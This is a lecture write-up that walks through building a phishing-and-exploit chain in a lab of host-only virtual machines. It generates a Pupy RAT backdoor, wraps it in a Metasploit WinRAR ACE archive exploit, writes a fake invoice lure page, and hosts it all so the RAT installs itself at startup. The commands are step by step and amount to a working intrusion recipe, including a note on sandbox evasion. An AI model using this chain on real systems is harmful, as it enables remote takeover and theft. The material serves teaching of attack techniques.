Building Malware - Metasploit & Pupy RAT
by Coleman Kane
This lecture covered using Pupy RAT, Metasploit, and Kali to build malware for an attack.
Setting up Kali for Pupy RAT
The Pupy RAT tool is an open source Remote Access Tool that was reportedly used in an attack targeting Saudi Arabian Targets in 2017. The tool has extensive capabilities, as well as integrated Python capability to make it a lot easier to extend and script by the adversary.
You can visit the following GitHub page to learn more:
To replay the steps I used in the lecture, you can open up Kali, then bring up a terminal, and run the following commands which are documented in Pupy RAT’s install instructions.
apt-get install git libssl1.0-dev libffi-dev python-dev \ python-pip build-essential swig tcpdump python-virtualenv mkdir -p ~/tools/ git clone --recursive https://github.com/n1nj4sec/pupy cd pupy python create-workspace.py -DG pupyw ..... wait for some time ...
Once complete, you can run the following command, from inside of
~/tools/pupy/pupyw, to start the Pupy RAT shell:
Staging Additional Components for the Attack
Additionally, I want to pull down a copy of the WinRAR 5.61 installer, because we want to pretend to trick a user into installing this version onto the Win 7 VM.
wget -o ~/tools/pupy/pupyw/wrar561.exe https://www.rarlab.com/rar/wrar561.exe
Finally, I demonstrated an example HTML file intended to look like a message telling the target to install this
package in order to view an invoice. The content of that HTML file is below, and following the commands below you
can write it into
cat > ~/tools/pupy/pupyw/index.html << END <p>Below is the invoice you've requested</p> <p>Please use <a href=wrar561.exe>this tool</a> to view it, and get back to us.</p> <p><a href=invoice.pdf.ace>invoice.pdf</a></p> END
Generate the Pupy RAT Backdoor
Once I have done all of the above, I switch the network from NAT over to the Host-only networking mode. Once complete,
I loaded up Pupy RAT using the
pupysh command described above. To generate the malware EXE, I run the following command
from within the shell, which will create the new file
invoice.exe in the
gen -A x86 -O windows -f client -o invoice.exe -D .
Build the Exploit With Metasploit
pupysh running and open a new terminal for Metasploit. Run the following commands in metasploit (after waiting for
it to start up), in order to package this up into an ACE archive exploit:
use exploit/windows/fileformat/winrar_ace set CUSTFILE invoice.exe set FILENAME invoice.pdf.ace set payload generic/custom exploit
Once you run the exploit command, a new ACE archive will get installed into
~/.msf4/local/invoice.pdf.ace. You will want
to use another shell to copy this into the
pupyw staging directory:
cp ~/.msf4/local/invoice.pdf.ace ~/tools/pupy/pupyw
Hosting the Attack for Delivery
Finally we used SimpleHTTPServer to host all of this on a webserver to direct the victim VM to, listening on port 80:
python -m SimpleHTTPServer 80
Exploiting the Victim
Next we configure the Windows VM with Host-only Networking using the same virtual interface as we have configured for the Kali VM.
We have Internet Explorer visit the page and follow the directions and hyperlinks. Install WinRAR and then save and extract the
ACE archive. The malware gets installed by WinRAR into the user’s
Startup folder, making it something that will start the next
time the user reboots the system. This has the added benefit of minimizing the behavior that will automatically run inside of an
automated sandbox, while still being relatively reliable: the user is likely to either log out or reboot their terminal sometime
within the next week.
Once the user is logged back in after a reboot or sign-out, the malware will connect to the Pupy RAT shell, and we can use all of the commands and modules therein to explore the victim VM. Note that this attack would likely work on a Windows 10 system as well, though some behaviors might be identified as suspicious if Windows Defender is enabled.